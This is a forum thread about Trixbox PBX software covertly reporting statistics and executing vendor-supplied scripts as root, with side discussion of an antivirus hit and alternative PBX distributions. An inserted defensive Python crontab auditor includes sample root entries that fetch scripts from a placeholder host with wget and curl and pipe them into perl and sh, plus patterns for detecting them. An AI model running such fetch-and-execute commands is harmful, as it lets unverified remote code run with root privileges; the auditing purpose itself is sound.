
tommy13v
Premium Member
join:2002-02-15
Niskayuna NY

[General] Trixbox phoning home controversy.

Story:

An anonymous reader writes to let us know that users of Trixbox, a PBX based on Asterisk, recently discovered that the software has been phoning home with statistics about their installations. It's easy enough to disable, and not particularly stealthy (beyond encrypting the data sent back), but customers in the forum are annoyed at not having been informed of the reporting. Trixbox is owned by Fonality, which makes customized PBXs (again based on Asterisk) for paying customers.

»yro.slashdot.org/yro/07/ ··· 43.shtml
Test99
Premium Member
join:2003-04-24
San Jose, CA

How do you feel about it, Tommy?

tommy13v
Premium Member
join:2002-02-15
Niskayuna NY

To be honest, I could care less about the fact that they want to get some stats on the install base, but what I do care about is that they are executing commands as root on the box, and if their servers are compromised or someone working for them decides he is upset, then they could in theory execute a command as root to cause a problem.

I see it as a security risk.
mikesm559
Member
join:2003-11-05
Fresno, CA

to tommy13v
Looks like from the perl script that this same approach is used by Trixbox Pro and Fonality to grab data from those systems too.

One hacker breaks into update.fonality.com and they can be running scripts on Fonality-based PBXs across the world. As root. And I bet that the Fonality PBXs are almost all inside the firewall, so who knows how much damage this thing could do inside a company?

And the Fonality people fess up to Trixbox CE having the issue, but leave out that Fonality and Trixbox Pro systems are just as vulnerable. That really is pretty crappy behavior.
cbrain (banned)
Member
join:2000-05-21
Silver Spring, MD

to tommy13v

Nerd Vittles takes notice

Monday, December 17, 2007
Just Say No: Hidden BOTs and Asterisk Don't Mix

... Our objection is more fundamental and goes to the existence of the tool itself and the failure to disclose it. Unfortunately, a remotely configurable BOT with root access privileges is a bit like giving someone a blank check… with your signature affixed. And it’s worse in this case because users had no notice that they were handing over the keys to their castle by installing and using trixbox. One can’t help wondering if Fonality management really grasps how dangerous such a system design is in this day and age. This isn’t about the commands that Fonality was executing. It’s about the commands that could be executed if this system were ever compromised. We have daily logs full of attempts to hack our systems using, you guessed it, remotely controlled BOTS.
...
»nerdvittles.com/index.php?p=198
Test99
Premium Member
join:2003-04-24
San Jose, CA

Not Just Trixbox

I recently installed a Windows port of Asterisk from this site: http://www.asteriskwin32.com/ to evaluate it.

The next Zone Alarm scan discovered this nasty critter:

Win32.Backdoor.IRCBot.td
in c:\Program Files\cygroot\bin\cygwin.dll

This is the registry entry:
File: C:\Program Files\cygroot\bin\cygwin1.dll
Module: C:\Program Files\cygroot\bin\cygwin1.dll
RegistryKey: HKEY_CURRENT_USER\Software\Cygnus Solutions
RegistryKey: HKEY_LOCAL_MACHINE\SOFTWARE\Cygnus Solutions

I'm still investigating to see what I have to do to clean the system.
cbrain (banned)
Member
join:2000-05-21
Silver Spring, MD

Re: [General] Trixbox phoning home controversy.

said by feelyou22:

do you feel about it,
I feel hurt ... betrayed ... vulnerable. I never thought free software I was so strongly attracted to would do something like this to me.
hoolahoous
Member
join:2004-08-25
Red Valley, AZ

to tommy13v
said by tommy13v:

To be honest I could care less about the fact that they want to get some stats of the install base
The implementation was really bad... it would actually download a script from Fonality servers and execute it (possibly as root).
That script could do ANYTHING... from sniffing your network to installing backdoors/trojans, ____ (fill in your worst-case nightmare).
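
A defender-side check for the kind of entry mikesm559 and hoolahoous are describing (a scheduled job that downloads a script from a vendor server and executes it, possibly as root): the following is an added example written for this thread, not Trixbox's or Fonality's code, and it is not the perl script mentioned above. It parses a system crontab in /etc/crontab format (five time fields, user, command; @daily-style entries too) and flags any entry that pipes curl/wget output straight into a shell or interpreter, rating root entries highest. The crontab text and the host updates.example.invalid are constructed placeholders, not real entries or servers.

```python
"""
Audit a system crontab for "download-and-execute" entries.

Added example for this thread; not Trixbox's or Fonality's code. The crontab
text below is constructed for the example, and updates.example.invalid is a
placeholder host, not a real server.
"""
import re
from dataclasses import dataclass
from typing import Iterator, List, Tuple

# Constructed sample in /etc/crontab format (minute hour dom month dow USER command).
SAMPLE_CRONTAB = """\
# m h dom mon dow user  command
SHELL=/bin/sh
0 3 * * * root /usr/bin/updatedb
*/5 * * * * root wget -q -O - http://updates.example.invalid/stats.pl | perl
30 2 * * * asterisk /usr/sbin/logrotate /etc/logrotate.conf
15 * * * * root curl -s https://updates.example.invalid/agent.sh | sh
@daily root /usr/local/bin/cleanup.sh
0 4 * * * backup /usr/local/bin/backup.sh
"""

ENV_ASSIGN = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*=")
DOWNLOADER = re.compile(r"\b(curl|wget|lynx|fetch)\b")
# A pipe into a shell or scripting interpreter, optionally through sudo.
PIPE_TO_INTERPRETER = re.compile(r"\|\s*(?:sudo\s+)?(?:sh|bash|dash|zsh|perl|python\d?|php)\b")


@dataclass
class Finding:
    line_no: int
    user: str
    command: str
    severity: str
    reason: str


def parse_system_crontab(text: str) -> Iterator[Tuple[int, str, str]]:
    """Yield (line_no, user, command) for each schedule entry in /etc/crontab format.

    Comments, blank lines and VAR=value environment lines are skipped.
    """
    for line_no, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#") or ENV_ASSIGN.match(line):
            continue
        if line.startswith("@"):           # @reboot, @daily, ...: schedule user command
            fields = line.split(None, 2)
            if len(fields) < 3:
                continue
            yield line_no, fields[1], fields[2]
        else:                              # five time fields, user, command
            fields = line.split(None, 6)
            if len(fields) < 7:
                continue
            yield line_no, fields[5], fields[6]


def audit_crontab(text: str) -> List[Finding]:
    """Flag entries that fetch content from the network and pipe it into an interpreter."""
    findings = []
    for line_no, user, command in parse_system_crontab(text):
        if DOWNLOADER.search(command) and PIPE_TO_INTERPRETER.search(command):
            severity = "high" if user == "root" else "medium"
            reason = ("fetches remote content and executes it unverified"
                      + (" as root" if user == "root" else ""))
            findings.append(Finding(line_no, user, command, severity, reason))
    return findings


if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB):
        print(f"line {f.line_no}: [{f.severity}] user={f.user}: {f.command}\n    -> {f.reason}")
```

Run against the sample, it flags lines 4 and 6 (both root). On a real box you would point it at /etc/crontab and the files under /etc/cron.d; a vendor job that stages the download to a file and runs it in a second step will not match the pipe pattern, so treat this as a first pass, not a complete audit.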

tommy13v
Premium Member
join:2002-02-15
Niskayuna NY

to Test99

Re: Not Just Trixbox

That DLL acts as a Linux API emulation layer, providing the Linux functionality.
kaila
Member
join:2000-10-11
Lincolnshire, IL

to tommy13v

Re: [General] Trixbox phoning home controversy.

Fonality has been attempting (if quietly) to monetize trixbox and their user base for a while now, and I think this was an obviously not well thought out attempt to collect what users are doing with CE toward that end. While not quite as bad as Sony's rootkit fiasco, it is a pretty serious issue and potentially reputation destroying. Kerry, Chris, and Andrew are certainly getting hammered for it.

Right now they seem to be doing the best they can at the moment (capitulating, and promising to remove the vulnerability), but time will tell if these and future actions will have a positive effect. This is certainly a teaching moment if there ever was one. Trixbox may ultimately benefit if it forces Fonality to rethink what's best for trixbox within their organization.

For now, I'm using PBXiaf.

tommy13v
Premium Member
join:2002-02-15
Niskayuna NY

how is PBXiaf going for you?
Test99
Premium Member
join:2003-04-24
San Jose, CA

to tommy13v

Re: Not Just Trixbox

said by tommy13v:

That DLL acts as a Linux API emulation layer providing the linux functionality.
Understood. What's not yet clear is where it acquired the ability to take orders from Internet Relay Chat.
kaila
Member
join:2000-10-11
Lincolnshire, IL

to tommy13v

Re: [General] Trixbox phoning home controversy.

said by tommy13v:

how is PBXiaf going for you?
Amazingly well actually. The install is simple and produces a very stable system. Config Edit is rolled into freePBX and endpoint management is there (one feature trixbox did well and I don't think I can live without). There are the 'kitchen sink' aspects of trixbox that PBXiaf can't match. But perhaps due to the overall simplicity of the install, they have been able to steadily crank out script based features. Overall I'm happy and would recommend it to almost anyone.

Ward's the one who got me into asterisk, and he always seems to have the right combination of technical knowledge, careful motivation, and communication skills to put people on the path to successful asterisk based systems.
celtic0 (banned)
Member
join:2001-02-08
USA

said by kaila:

... Config Edit is rolled into freePBX and endpoint management is there (one feature trixbox did well and I don't think I can live without). There are the 'kitchen sink' aspects of trixbox that PBXiaf can't match. But perhaps due to the overall simplicity of the install, they have been able to steadily crank out script based features. Overall I'm happy and would recommend it to almost anyone.
...
What features are in Trixbox that are not included in PBXiaf?
kaila
Member
join:2000-10-11
Lincolnshire, IL

said by celtic0:

What features are in Trixbox that are not included in PBXiaf?
Both use freePBX for configuring the server, so trixbox really adds nothing over PBXiaf from the standpoint of taking/making/routing calls.

Trixbox does offer HUDlite, trixnet (a kind of trixbox enum service), and literally hundreds of extra packages that a very small minority would find useful. On the other side, PBXiaf offers a small but growing number of their own add-ons as well, that in general have a broader appeal.
rugby
I think I know it all.
Member
join:2000-09-26
Plainfield, IN

to celtic0
A decent endpoint manager for most IP phones.
kaila
Member
join:2000-10-11
Lincolnshire, IL

said by rugby:

A decent endpoint manager for most IP phones.
Agreed. While PBXiaf does offer endpoint management, it is not GUI-based like trixbox, and requires hand-editing config files. GUI-based endpoint management is on the freePBX roadmap for version 3, but that release is a long way off....
B04
Premium Member
join:2000-10-28

to Test99

Re: Not Just Trixbox

I'm betting (guessing) that it didn't, and that this is a false positive... Good luck. You could try running it by one of the multi-engine scanners (Jotti).

-- B
Test99
Premium Member
join:2003-04-24
San Jose, CA

said by B04:

I'm betting (guessing) that it didn't, and that this is a false positive...
Good suggestion. You may be right. Scans thus far have not detected any other signs of intrusion. Writing malware detection programs must be a difficult assignment.
B04
Premium Member
join:2000-10-28

Maybe, but I suspect the opposite -- that it's astonishingly EASY, at least as it's currently practiced, and that the rewards are so great that no one has to try very hard.

That's why free products (from AVG to the open source ClamAV project) can perform so well, and that's why the mainstream commercial offerings (McAfee and Symantec) are such festering mounds of bloated feces, and that's why the slightest little change in code lets malware continue to slip by the overwhelming majority of "detectors".

Yeah, it's a losing proposition because one person's trojan is another person's remote control feature, but that's not much excuse for today's shoddy state of affairs. When in doubt, just blame Windows.

-- B
Test99
Premium Member
join:2003-04-24
San Jose, CA

to tommy13v

Re: [General] Trixbox phoning home controversy.

Sorry, Tommy. Didn't mean to hijack your thread.

tommy13v
Premium Member
join:2002-02-15
Niskayuna NY

No biggy.